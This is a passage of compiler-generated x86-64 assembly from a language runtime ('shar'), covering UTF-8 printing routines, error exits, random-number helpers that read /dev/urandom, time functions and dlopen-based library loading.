BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 .L430: cmp QWORD PTR -288[rbp], 253 jbe .L428 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -288[rbp], 0 jmp .L428 .L438: nop .L428: add QWORD PTR -280[rbp], 1 .L426: mov rax, QWORD PTR -312[rbp] cmp rax, QWORD PTR -280[rbp] ja .L432 cmp BYTE PTR -315[rbp], 0 je .L433 lea rdx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rdx mov BYTE PTR [rax], 10 add QWORD PTR -288[rbp], 1 .L433: cmp QWORD PTR -288[rbp], 0 je .L434 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT .L434: mov rax, QWORD PTR -296[rbp] mov rdi, rax call fflush@PLT .L437: nop nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L435 call __stack_chk_fail@PLT .L435: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE37: .size shar__println__string, .-shar__println__string .globl shar__print__as__error .type shar__print__as__error, @function shar__print__as__error: .LFB38: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 336 mov QWORD PTR -328[rbp], rdi mov QWORD PTR -336[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -328[rbp] mov QWORD PTR -312[rbp], rdx mov rdx, QWORD PTR -336[rbp] mov QWORD PTR -304[rbp], rdx mov QWORD PTR -296[rbp], rax mov BYTE PTR -315[rbp], 0 cmp QWORD PTR -312[rbp], 0 jne .L440 cmp BYTE PTR -315[rbp], 0 je .L453 .L440: mov QWORD PTR -288[rbp], 0 mov QWORD PTR -280[rbp], 0 jmp .L442 .L448: mov rax, QWORD PTR -280[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -304[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -314[rbp], ax cmp WORD PTR -314[rbp], 0 je .L454 cmp WORD PTR -314[rbp], 127 ja .L445 movzx eax, WORD PTR -314[rbp] mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L446 .L445: cmp WORD PTR -314[rbp], 2047 ja .L447 movzx eax, WORD PTR -314[rbp] shr ax, 6 or eax, -64 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L446 .L447: movzx eax, WORD PTR -314[rbp] shr ax, 12 or eax, -32 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 .L446: cmp QWORD PTR -288[rbp], 253 jbe .L444 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -288[rbp], 0 jmp .L444 .L454: nop .L444: add QWORD PTR -280[rbp], 1 .L442: mov rax, QWORD PTR -312[rbp] cmp rax, QWORD PTR -280[rbp] ja .L448 cmp BYTE PTR -315[rbp], 0 je .L449 lea rdx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rdx mov BYTE PTR [rax], 10 add QWORD PTR -288[rbp], 1 .L449: cmp QWORD PTR -288[rbp], 0 je .L450 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT .L450: mov rax, QWORD PTR -296[rbp] mov rdi, rax call fflush@PLT .L453: nop nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L451 call __stack_chk_fail@PLT .L451: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE38: .size shar__print__as__error, .-shar__print__as__error .globl shar__println__as__error .type shar__println__as__error, @function shar__println__as__error: .LFB39: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 336 mov QWORD PTR -328[rbp], rdi mov QWORD PTR -336[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -328[rbp] mov QWORD PTR -312[rbp], rdx mov rdx, QWORD PTR -336[rbp] mov QWORD PTR -304[rbp], rdx mov QWORD PTR -296[rbp], rax mov BYTE PTR -315[rbp], 1 cmp QWORD PTR -312[rbp], 0 jne .L456 cmp BYTE PTR -315[rbp], 0 je .L469 .L456: mov QWORD PTR -288[rbp], 0 mov QWORD PTR -280[rbp], 0 jmp .L458 .L464: mov rax, QWORD PTR -280[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -304[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -314[rbp], ax cmp WORD PTR -314[rbp], 0 je .L470 cmp WORD PTR -314[rbp], 127 ja .L461 movzx eax, WORD PTR -314[rbp] mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L462 .L461: cmp WORD PTR -314[rbp], 2047 ja .L463 movzx eax, WORD PTR -314[rbp] shr ax, 6 or eax, -64 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L462 .L463: movzx eax, WORD PTR -314[rbp] shr ax, 12 or eax, -32 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 .L462: cmp QWORD PTR -288[rbp], 253 jbe .L460 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -288[rbp], 0 jmp .L460 .L470: nop .L460: add QWORD PTR -280[rbp], 1 .L458: mov rax, QWORD PTR -312[rbp] cmp rax, QWORD PTR -280[rbp] ja .L464 cmp BYTE PTR -315[rbp], 0 je .L465 lea rdx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rdx mov BYTE PTR [rax], 10 add QWORD PTR -288[rbp], 1 .L465: cmp QWORD PTR -288[rbp], 0 je .L466 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT .L466: mov rax, QWORD PTR -296[rbp] mov rdi, rax call fflush@PLT .L469: nop nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L467 call __stack_chk_fail@PLT .L467: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE39: .size shar__println__as__error, .-shar__println__as__error .section .rodata .LC2: .string "Error: " .text .globl shar__print__error .type shar__print__error, @function shar__print__error: .LFB40: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 336 mov QWORD PTR -328[rbp], rdi mov QWORD PTR -336[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 7 mov esi, 1 lea rdi, .LC2[rip] call fwrite@PLT mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -328[rbp] mov QWORD PTR -312[rbp], rdx mov rdx, QWORD PTR -336[rbp] mov QWORD PTR -304[rbp], rdx mov QWORD PTR -296[rbp], rax mov BYTE PTR -315[rbp], 1 cmp QWORD PTR -312[rbp], 0 jne .L472 cmp BYTE PTR -315[rbp], 0 je .L485 .L472: mov QWORD PTR -288[rbp], 0 mov QWORD PTR -280[rbp], 0 jmp .L474 .L480: mov rax, QWORD PTR -280[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -304[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -314[rbp], ax cmp WORD PTR -314[rbp], 0 je .L486 cmp WORD PTR -314[rbp], 127 ja .L477 movzx eax, WORD PTR -314[rbp] mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L478 .L477: cmp WORD PTR -314[rbp], 2047 ja .L479 movzx eax, WORD PTR -314[rbp] shr ax, 6 or eax, -64 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 jmp .L478 .L479: movzx eax, WORD PTR -314[rbp] shr ax, 12 or eax, -32 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 movzx eax, WORD PTR -314[rbp] and eax, 63 or eax, -128 mov edx, eax lea rcx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rcx mov BYTE PTR [rax], dl add QWORD PTR -288[rbp], 1 .L478: cmp QWORD PTR -288[rbp], 253 jbe .L476 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT mov QWORD PTR -288[rbp], 0 jmp .L476 .L486: nop .L476: add QWORD PTR -280[rbp], 1 .L474: mov rax, QWORD PTR -312[rbp] cmp rax, QWORD PTR -280[rbp] ja .L480 cmp BYTE PTR -315[rbp], 0 je .L481 lea rdx, -272[rbp] mov rax, QWORD PTR -288[rbp] add rax, rdx mov BYTE PTR [rax], 10 add QWORD PTR -288[rbp], 1 .L481: cmp QWORD PTR -288[rbp], 0 je .L482 mov rcx, QWORD PTR -296[rbp] mov rdx, QWORD PTR -288[rbp] lea rax, -272[rbp] mov esi, 1 mov rdi, rax call fwrite@PLT .L482: mov rax, QWORD PTR -296[rbp] mov rdi, rax call fflush@PLT .L485: nop mov edi, 1 call exit@PLT .cfi_endproc .LFE40: .size shar__print__error, .-shar__print__error .section .rodata .LC3: .string "Error: %s\n" .text .globl shar__print__builtin__error .type shar__print__builtin__error, @function shar__print__builtin__error: .LFB41: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -8[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov edi, 1 call exit@PLT .cfi_endproc .LFE41: .size shar__print__builtin__error, .-shar__print__builtin__error .local randomNumberSource .comm randomNumberSource,40,32 .data .align 8 .type currentRandomNumberIndex, @object .size currentRandomNumberIndex, 8 currentRandomNumberIndex: .quad 4096 .local randomNumbers .comm randomNumbers,32768,32 .local cryptographic__random__number__mutex .comm cryptographic__random__number__mutex,40,32 .text .globl shar__get__random__number .type shar__get__random__number, @function shar__get__random__number: .LFB42: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 144 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -136[rbp], rax mov rax, QWORD PTR -136[rbp] shr rax, 16 and eax, 32767 mov rdx, rax mov rax, QWORD PTR randomNumberSource[rip+8] mov QWORD PTR -128[rbp], rax mov rax, QWORD PTR -128[rbp] shr rax and eax, 1073709056 or rdx, rax mov rax, QWORD PTR randomNumberSource[rip+16] mov QWORD PTR -120[rbp], rax mov rax, QWORD PTR -120[rbp] sal rax, 14 mov rcx, rax movabs rax, 35183298347008 and rax, rcx or rdx, rax mov rax, QWORD PTR randomNumberSource[rip+24] mov QWORD PTR -112[rbp], rax mov rax, QWORD PTR -112[rbp] sal rax, 29 mov rcx, rax movabs rax, 1152886320234758144 and rax, rcx or rdx, rax mov rax, QWORD PTR randomNumberSource[rip+32] mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -104[rbp] sal rax, 44 mov rcx, rax movabs rax, -1152921504606846976 and rax, rcx or rax, rdx mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -96[rbp] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -88[rbp] xchg rax, QWORD PTR randomNumberSource[rip] mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -80[rbp] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -72[rbp], rax mov rax, QWORD PTR -72[rbp] xchg rax, QWORD PTR randomNumberSource[rip+8] mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -64[rbp], rax mov rax, QWORD PTR -64[rbp] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -56[rbp] xchg rax, QWORD PTR randomNumberSource[rip+16] mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -40[rbp] xchg rax, QWORD PTR randomNumberSource[rip+24] mov rax, QWORD PTR randomNumberSource[rip] mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -32[rbp] imul rax, rax, 1103515245 add rax, 12345 mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -24[rbp] xchg rax, QWORD PTR randomNumberSource[rip+32] mov rax, QWORD PTR -16[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L490 call __stack_chk_fail@PLT .L490: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE42: .size shar__get__random__number, .-shar__get__random__number .section .rodata .LC4: .string "r" .LC5: .string "/dev/urandom" .align 8 .LC6: .string "Can't read the file \"/dev/urandom\".\n" .text .globl shar__get__cryptographic__random__number .type shar__get__cryptographic__random__number, @function shar__get__cryptographic__random__number: .LFB43: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR currentRandomNumberIndex[rip] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -56[rbp] cmp rax, 4096 jne .L492 lea rdi, cryptographic__random__number__mutex[rip] call pthread_mutex_lock@PLT mov rax, QWORD PTR currentRandomNumberIndex[rip] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] cmp rax, 4096 jne .L493 lea rsi, .LC4[rip] lea rdi, .LC5[rip] call fopen@PLT mov QWORD PTR -24[rbp], rax cmp QWORD PTR -24[rbp], 0 sete al movzx eax, al test rax, rax jne .L494 mov rax, QWORD PTR -24[rbp] mov rcx, rax mov edx, 4096 mov esi, 8 lea rdi, randomNumbers[rip] call fread@PLT cmp rax, 4096 setne al movzx eax, al test rax, rax je .L495 .L494: mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 36 mov esi, 1 lea rdi, .LC6[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L495: mov rax, QWORD PTR -24[rbp] mov rdi, rax call fclose@PLT mov QWORD PTR -40[rbp], 0 mov rax, QWORD PTR -40[rbp] xchg rax, QWORD PTR currentRandomNumberIndex[rip] .L493: lea rdi, cryptographic__random__number__mutex[rip] call pthread_mutex_unlock@PLT .L492: mov rax, QWORD PTR currentRandomNumberIndex[rip] lea rdx, 0[0+rax*8] lea rax, randomNumbers[rip] mov rax, QWORD PTR [rdx+rax] mov QWORD PTR -16[rbp], rax mov DWORD PTR -60[rbp], 1 mov eax, DWORD PTR -60[rbp] cdqe lock xadd QWORD PTR currentRandomNumberIndex[rip], rax mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -16[rbp] mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L497 call __stack_chk_fail@PLT .L497: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE43: .size shar__get__cryptographic__random__number, .-shar__get__cryptographic__random__number .globl shar__get__current__time .type shar__get__current__time, @function shar__get__current__time: .LFB44: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -32[rbp] mov esi, 0 mov rdi, rax call gettimeofday@PLT mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR timezone[rip] sub rax, rdx imul rdx, rax, 1000000 mov rax, QWORD PTR -24[rbp] add rax, rdx mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L500 call __stack_chk_fail@PLT .L500: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE44: .size shar__get__current__time, .-shar__get__current__time .globl shar__get__current__utc__time .type shar__get__current__utc__time, @function shar__get__current__utc__time: .LFB45: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -32[rbp] mov esi, 0 mov rdi, rax call gettimeofday@PLT mov rax, QWORD PTR -32[rbp] imul rdx, rax, 1000000 mov rax, QWORD PTR -24[rbp] add rax, rdx mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L503 call __stack_chk_fail@PLT .L503: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE45: .size shar__get__current__utc__time, .-shar__get__current__utc__time .globl shar__load__lib .type shar__load__lib, @function shar__load__lib: .LFB46: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov QWORD PTR -136[rbp], rdi mov QWORD PTR -144[rbp], rsi mov QWORD PTR -152[rbp], rdx mov rax, QWORD PTR -136[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -144[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L505 .L517: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -114[rbp], ax mov BYTE PTR -115[rbp], 0 cmp WORD PTR -114[rbp], 0 je .L522 cmp WORD PTR -114[rbp], 127 ja .L508 mov BYTE PTR -115[rbp], 1 jmp .L509 .L508: cmp WORD PTR -114[rbp], 2047 ja .L510 mov BYTE PTR -115[rbp], 2 jmp .L509 .L510: mov BYTE PTR -115[rbp], 3 .L509: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L511 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L511: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -115[rbp] cmp eax, 3 je .L513 cmp eax, 3 jg .L514 cmp eax, 1 je .L515 cmp eax, 2 je .L516 jmp .L514 .L515: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -114[rbp] mov BYTE PTR [rax], dl jmp .L514 .L516: movzx eax, WORD PTR -114[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L514 .L513: movzx eax, WORD PTR -114[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L514: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -72[rbp], rax jmp .L507 .L522: nop .L507: add QWORD PTR -56[rbp], 1 .L505: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L517 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L518 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L518: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -112[rbp], rax mov rax, QWORD PTR -112[rbp] mov esi, 257 mov rdi, rax call dlopen@PLT mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -112[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -152[rbp] mov rdx, QWORD PTR -104[rbp] mov QWORD PTR [rax], rdx cmp QWORD PTR -104[rbp], 0 setne al leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE46: .size shar__load__lib, .-shar__load__lib .globl shar__get__from__lib .type shar__get__from__lib, @function shar__get__from__lib: .LFB47: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov QWORD PTR -136[rbp], rdi mov QWORD PTR -144[rbp], rsi mov QWORD PTR -152[rbp], rdx mov QWORD PTR -160[rbp], rcx mov rax, QWORD PTR -136[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -144[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L524 .L536: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -114[rbp], ax mov BYTE PTR -115[rbp], 0 cmp WORD PTR -114[rbp], 0 je .L541 cmp WORD PTR -114[rbp], 127 ja .L527 mov BYTE PTR -115[rbp], 1 jmp .L528 .L527: cmp WORD PTR -114[rbp], 2047 ja .L529 mov BYTE PTR -115[rbp], 2 jmp .L528 .L529: mov BYTE PTR -115[rbp], 3 .L528: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L530 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L530: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -115[rbp] cmp eax, 3 je .L532 cmp eax, 3 jg .L533 cmp eax, 1 je .L534 cmp eax, 2 je .L535 jmp .L533 .L534: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -114[rbp] mov BYTE PTR [rax], dl jmp .L533 .L535: movzx eax, WORD PTR -114[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L533 .L532: movzx eax, WORD PTR -114[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -114[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L533: movzx eax, BYTE PTR -115[rbp] add QWORD PTR -72[rbp], rax jmp .L526 .L541: nop .L526: add QWORD PTR -56[rbp], 1 .L524: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L536 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L537 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L537: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD 